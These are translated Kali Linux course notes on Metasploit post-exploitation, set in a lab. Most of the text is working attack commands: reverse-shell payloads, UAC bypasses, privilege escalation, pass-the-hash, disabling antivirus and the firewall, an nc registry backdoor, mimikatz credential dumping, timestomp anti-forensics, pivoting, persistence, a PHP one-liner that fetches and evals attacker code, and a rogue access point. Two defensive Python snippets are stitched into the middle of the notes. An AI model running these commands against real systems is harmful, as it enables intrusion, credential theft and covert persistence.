Kali Linux Penetration Testing 146: Metasploit Post-Exploitation Phase

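This article records in detail the process of learning, using and penetration testing with Kali Linux 2018.1. The tutorial followed is the "Kali Linux Penetration Testing" course from 安全牛课堂.

Kali Linux Penetration Testing (Yuan Fanghong, 苑房弘) blog notes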

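1. Preparation

  • After gaining control of the target system, expand the foothold

    • Privilege escalation
    • Information gathering
    • Internal network penetration
    • Persistent backdoor
  • Expand the foothold from an existing session

    • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe
  • Listen on Kali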

    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.0.0.128
    msf exploit(multi/handler) > exploit -j
    
  • Run payload.exe on the Windows system

  • Enter meterpreter on Kali

    msf exploit(multi/handler) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
    
    msf exploit(multi/handler) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: WIN7-VM\John
    

2. Obtaining SYSTEM account privileges

  • Privilege escalation fails, usually because of UAC restrictions

    meterpreter > getuid
    Server username: WIN7-VM\John
    meterpreter > load priv
    [-] The 'priv' extension has already been loaded.
    meterpreter > getsystem 
    [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    
    
    meterpreter > background
    
  • Bypassing the UAC restriction

    • use exploit/windows/local/ask

      use exploit/windows/local/ask
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set FILENAME win_update.exe
      set SESSION 1
      exploit
      

      meterpreter > getsystem
      meterpreter > getuid
      

    • use exploit/windows/local/bypassuac

      use exploit/windows/local/bypassuac
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      show targets
      exploit
      

    • use exploit/windows/local/bypassuac_injection

      use exploit/windows/local/bypassuac_injection
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

  • Escalate directly to SYSTEM by exploiting a vulnerability

    • use exploit/windows/local/ms13_053_schlamperei

      use exploit/windows/local/ms13_053_schlamperei
      set SESSION 1
      

    • use exploit/windows/local/ms13_081_track_popup_menu

      use exploit/windows/local/ms13_081_track_popup_menu
      set SESSION 1
      exploit
      

    • use exploit/windows/local/ms13_097_ie_registry_symlink

      use exploit/windows/local/ms13_097_ie_registry_symlink
      set SESSION 1
      set URIPATH /
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set SRVHOST 10.0.0.128
      exploit
      
    • use exploit/windows/local/ppr_flatten_rec

      use exploit/windows/local/ppr_flatten_rec
      set SESSION 1
      exploit
      

  • Graphical payload

    • set payload windows/vncinject/reverse_tcp

      use exploit/windows/local/ppr_flatten_rec
      set payload windows/vncinject/reverse_tcp
      set SESSION 1
      set LHOST 10.0.0.128
      set ViewOnly false
      exploit
      

  • Disabling UAC

    • Get a hashdump

      meterpreter > hashdump
          Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
      
    • Attempt to use the hash

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

      Error: Exploit failed [no-access]

    • UAC must be disabled beforehand

      sessions -i 2
      shell
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
      shutdown -r -t 0
      

    • Try again

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

4. Basic operations

1. Turn off the firewall

  • Requires administrator or SYSTEM privileges

    netsh advfirewall set allprofiles state on
    netsh advfirewall set allprofiles state off
    

2. Stop windefend

  • Look up the service name

  • Stop the windefend service

    net stop windefend
    

3. BitLocker encryption

  • manage-bde -off C:
  • manage-bde -status C:

4. Disable DEP

  • bcdedit.exe /set {current} nx AlwaysOff

5. Kill antivirus software

  • run killav
  • run post/windows/manage/killav

6. Enable the Remote Desktop service

# Enable the service
run post/windows/manage/enable_rdp

# Disable the service
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt

# Enable the service
run getgui -e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc

7. View the remote desktop

  • screenshot
  • use espia
    • screengrab

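5. Attacking a domain controller with tokens

  • Tokens

    • Each time a user logs on, the account is bound to temporary tokens
    • Tokens are submitted for authentication when accessing resources, similar to web cookies
    • Delegate tokens: interactive logon sessions
    • Impersonate tokens: non-interactive logon sessions
    • After the account logs off, a delegate token becomes an impersonate token and its privileges remain valid
  • Incognito

    • A standalone tool, integrated by msf into meterpreter
    • No password, cracking or password hash is needed; it steals tokens to impersonate other users
    • Especially suited to privilege escalation and penetration across multiple operating systems in a domain environment
  • Set up a domain environment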

    • DC + XP
  • load incognito

    • list_tokens -u
    • impersonate_token lab\administrator
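    • The commands above require getsystem
      • A local user with ordinary privileges must first escalate privileges locally
      • use exploit/windows/local/ms10_015_kitrap0d
      • execute -f cmd.exe -i -t # -t: run the program with the currently impersonated token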
      • shell

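8. Registry

  • The registry stores almost all Windows configuration parameters

    • An improper modification can crash the system outright
    • Back up the whole registry before modifying it
    • Some registry modifications are irreversible
  • Common uses

    • Modifying or adding startup entries
    • Stealing secrets stored in the registry
    • Evading file-based antivirus scanning
  • Add an nc backdoor service through the registry (meterpreter)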

    • meterpreter >
    • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
    • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
  • Open a firewall port (meterpreter)

    • meterpreter >
    • execute -f cmd -i -H
    • netsh firewall show opmode
    • netsh firewall add portopening TCP 4444 "test" ENABLE ALL
    • shutdown -r -f -t 0
    • nc 10.0.0.132 444
  • Other registry keys

    • https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart
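
A defender-side check for the registry writes shown in this section and in the earlier step that disables UAC, as an added example that is not part of the original notes: it flags EnableLUA set to 0, LocalAccountTokenFilterPolicy set to 1, and a Run value that launches nc. The event tuples are constructed sample data modelled on Sysmon Event ID 13 records, and all function names are hypothetical.

```python
import re

# Constructed records (key, value name, data), shaped like Sysmon Event ID 13
# registry-set events. The last two entries are benign controls.
SAMPLE_EVENTS = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "EnableLUA", "DWORD (0x00000000)"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system",
     "LocalAccountTokenFilterPolicy", "DWORD (0x00000001)"),
    (r"HKLM\software\microsoft\windows\currentversion\run",
     "nc", r"C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "EnableLUA", "DWORD (0x00000001)"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Updater", r"C:\Program Files\Vendor\updater.exe /background"),
]

POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
RUN_KEY = r"hklm\software\microsoft\windows\currentversion\run"
# Heuristic (assumption): a Run value that starts netcat or passes a shell to -e.
SHELL_LISTENER = re.compile(r"\bn(c|cat)(\.exe)?\b|-e\s+cmd(\.exe)?\b", re.I)

def dword(data):
    """Return the integer in 'DWORD (0x...)' or a plain decimal string, else None."""
    m = re.search(r"0x([0-9a-f]+)", data, re.I)
    if m:
        return int(m.group(1), 16)
    return int(data) if data.strip().isdigit() else None

def classify(key, name, data):
    """Map one registry write to a finding string, or None if not of interest."""
    k, n = key.lower().rstrip("\\"), name.lower()
    if k == POLICY_KEY and n == "enablelua" and dword(data) == 0:
        return "UAC disabled (EnableLUA=0)"
    if k == POLICY_KEY and n == "localaccounttokenfilterpolicy" and dword(data) == 1:
        return "remote UAC token filtering disabled"
    if k == RUN_KEY and SHELL_LISTENER.search(data):
        return "Run key launches a network shell"
    return None

def scan(events):
    """Return (value name, finding) for every flagged event, in input order."""
    hits = ((name, classify(key, name, data)) for key, name, data in events)
    return [(name, verdict) for name, verdict in hits if verdict]

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_EVENTS):
        print(f"{name}: {verdict}")
```

Key names are compared case-insensitively because the two reg.exe commands in the notes spell the same key as `System` and `system`.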

9. Packet capture

  • Packet capture (meterpreter)
    • load sniffer
    • sniffer_interfaces
    • sniffer_start 2
    • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
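    • Captured packets are stored in an in-memory ring buffer (50000 packets) and are not written to disk
    • Meterpreter's own traffic is filtered out automatically; the whole transfer is encrypted with SSL/TLS
  • Decoding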
    • use auxiliary/sniffer/psnuffle
    • set PCAPFILE /root/1.cap

10. Searching for files

  • search -f *.ini
  • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

11. Cracking weak passwords

  • Crack weak passwords with John the Ripper

    • use post/windows/gather/hashdump # meterpreter with SYSTEM privileges
    • run # results are saved under /tmp
    • use auxiliary/analyze/jtr_crack_fast
    • run

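12. Erasing traces

  • File system access leaves traces, and digital forensics focuses on them
  • Penetration testers and attackers often want to destroy traces of file system access
  • The best way to avoid discovery by digital forensics: do not touch the file system

    • This is meterpreter's inherent advantage (it runs entirely in memory)
  • MAC times (Modified / Accessed / Changed)

    • ls -l --time=atime/mtime/ctime 1.txt
    • stat 1.txt
    • touch -d "2 days ago" 1.txt
    • touch -t 1501010101 1.txt
  • MACE: MFT entry

    • MFT: the Master File Table of the NTFS file system
    • Usually 1024 bytes or 2 disk sectors, holding multiple items of entry information
    • Contains extensive information about a file (size, name, directory location, disk location, creation date)
    • For more, study file system forensic analysis techniques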
  • Timestomp (meterpreter)

    • timestomp -v 1.txt
    • timestomp -f c:\autoexec.bat 1.txt
      -b -r # wipe the MACE time information; this option currently does not work
    • -m / -a / -c / -e / -z
    • timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt
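
How a forensic examiner can spot the MACE rewriting described above, as an added example that is not part of the original notes: it compares the $STANDARD_INFORMATION times with the $FILE_NAME creation time in each MFT entry and checks for the whole-second values that a seconds-resolution date format leaves behind. The records are constructed sample data, and the field and function names are hypothetical.

```python
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed MFT records as a $MFT parser might export them: the four
# $STANDARD_INFORMATION (SI) times, which timestomp rewrites, and the
# $FILE_NAME (FN) creation time, which is maintained by the file system driver.
SAMPLE_MFT = [
    {"name": "1.txt",
     "si": {"modified": "2015-01-01 01:01:00.000000",
            "accessed": "2015-01-01 01:01:00.000000",
            "created": "2015-01-01 01:01:00.000000",
            "entry": "2015-01-01 01:01:00.000000"},
     "fn_created": "2018-04-18 00:18:05.482913"},
    {"name": "report.docx",
     "si": {"modified": "2018-04-17 09:12:44.118203",
            "accessed": "2018-04-17 09:12:44.118203",
            "created": "2018-04-16 16:30:02.773915",
            "entry": "2018-04-17 09:12:44.118203"},
     "fn_created": "2018-04-16 16:30:02.773915"},
]


def indicators(record):
    """Return the timestomping heuristics that this MFT record trips."""
    si = {k: datetime.strptime(v, FMT) for k, v in record["si"].items()}
    fn_created = datetime.strptime(record["fn_created"], FMT)
    hits = []
    # SI creation earlier than FN creation is a common sign of backdating.
    if si["created"] < fn_created:
        hits.append("SI created earlier than FN created")
    # A date given to the second leaves the sub-second fraction at zero.
    if all(t.microsecond == 0 for t in si.values()):
        hits.append("all SI times have a zero sub-second part")
    return hits


def suspicious(records):
    """Return the names of records that trip at least one heuristic."""
    return [r["name"] for r in records if indicators(r)]


if __name__ == "__main__":
    for rec in SAMPLE_MFT:
        print(rec["name"], indicators(rec))
```

Both checks are heuristics: archive extraction and copy tools that preserve timestamps can trip them too, so a hit is a lead for review rather than proof.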

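13. Pivoting (springboard / hub / pivot point)

  • Build the payload with msfvenom
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
  • Obtain SYSTEM privileges

  • Use an already-controlled computer as the pivot for intruding into the internal network

  • To the other internal computers, all access appears to come from the pivot
  • run autoroute -s 1.1.1.0/24 # the target's internal subnet, which cannot reach the external network

  • Autoroute in a realistic scenario

    • Use Win7 to attack XP on the internal network (compare the cases where XP does and does not have external network access)
      • Scan the internal network: use auxiliary/scanner/portscan/tcp
  • Pivoting by port forwarding: portfwd

    • Use the already-controlled computer to forward ports between Kali and the target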
    • portfwd add -L LIP -l LPORT -r RIP -p RPORT
    • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
    • portfwd list / delete / flush
  • use exploit/windows/smb/ms08_067_netapi

    • set RHOST 127.0.0.1
    • set LHOST 2.1.1.10
  • use exploit/multi/handler
    • set exitonsession false

14. POST modules

  • meterpreter >
  • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
  • run post/windows/gather/checkvm
  • run post/windows/gather/credentials/credential_collector
  • run post/windows/gather/enum_applications
  • run post/windows/gather/enum_logged_on_users
  • run post/windows/gather/enum_snmp
  • run post/windows/manage/delete_user USERNAME=yuanfh
  • run post/multi/recon/local_exploit_suggester
  • run post/multi/gather/env
  • run post/multi/gather/firefox_creds
  • run post/multi/gather/ssh_creds
  • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
  • run hostsedit -e 1.1.1.1,www.baidu.com
  • migrate -N explorer.exe
  • run [tab] [tab]
  • run winenum

  • Automatically run meterpreter scripts

    • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
    • set InitialAutoRunScript checkvm
  • Automatically run post modules

    • set InitialAutoRunScript migrate -n explorer.exe
    • set AutoRunScript post/windows/gather/dumplinks

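15. Persistent backdoors

  • A meterpreter session obtained through an exploit runs in memory and is lost on reboot
  • Repeatedly exploiting the vulnerability may crash the service
  • A persistent backdoor keeps remote control available after the vulnerability has been patched

  • Meterpreter backdoor

    • run metsvc -A # use -r to remove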
    • use exploit/multi/handler
    • set PAYLOAD windows/metsvc_bind_tcp
    • set LPORT 31337
    • set RHOST 1.1.1.1
  • Persistent backdoor

    • run persistence -h
    • run persistence -X -i 10 -p 4444 -r 10.0.0.128
    • run persistence -U -i 20 -p 4444 -r 10.0.0.128
    • run persistence -S -i 20 -p 4444 -r 10.0.0.128

16. Extended msf usage: mimikatz

  • hashdump uses part of mimikatz's functionality
    • getsystem
    • load mimikatz
    • wdigest, kerberos, msv, ssp, tspkg, livessp
    • mimikatz_command -h
    • mimikatz_command -f a::
    • mimikatz_command -f samdump::hashes
    • mimikatz_command -f handle::list
    • mimikatz_command -f service::list
    • mimikatz_command -f crypto::listProviders
    • mimikatz_command -f winmine::infos # the Minesweeper game

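17. Code execution vulnerabilities

  • PHP shell

    • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
    • Start a listener in msf
    • Upload it to the web site and access it through a browser
  • Web Delivery

    • Use the code execution vulnerability to make the target fetch from the attacker's server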
    • use exploit/multi/script/web_delivery
    • set target 1
    • run
    • php -d allow_url_fopen=true -r "eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"

18. RFI: remote file inclusion

  • vi /etc/php5/cgi/php.ini
    • allow_url_fopen = On
    • allow_url_include = On
  • use exploit/unix/webapp/php_include
  • set RHOST 1.1.1.2
  • set PATH /dvwa/vulnerabilities/fi/
  • set PHPURI /?page=XXpathXX
  • set HEADERS "Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
  • set payload php/meterpreter/reverse_tcp
  • set lhost 1.1.1.1
  • exploit

18. Karmetasploit

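  • Fake AP, password sniffing, data interception, browser attacks
  • Multi-exploit resource file: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

  • Install the other dependencies

    • gem install activerecord sqlite3-ruby
  • Install and configure the infrastructure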

    • apt-get install isc-dhcp-server
    • cat /etc/dhcp/dhcpd.conf
      option domain-name-servers 10.0.0.1;
      default-lease-time 60;
      max-lease-time 72;
      ddns-update-style none;
      authoritative;
      log-facility local7;
      subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
      }
  • Fake AP

    • airmon-ng start wlan0
    • airbase-ng -P -C 30 -e "FREE" -v wlan0mon
    • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    • touch /var/lib/dhcp/dhcpd.leases
    • dhcpd -cf /etc/dhcp/dhcpd.conf at0
  • Start Karmetasploit

    • msfconsole -q -r karma.rc_.txt
  • Let users browse the Internet normally

    • vi karma.rc_.txt

      File link: https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg password: tpc0

    • Delete the setg parameters

    • Add other modules such as browser_autopwn2
    • Check for malicious traffic: auxiliary/vsploit/malware/dns*
  • Start Karmetasploit

    • msfconsole -q -r karma.rc_.txt
  • Add routing and firewall rules

    • echo 1 > /proc/sys/net/ipv4/ip_forward
    • iptables -P FORWARD ACCEPT
    • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
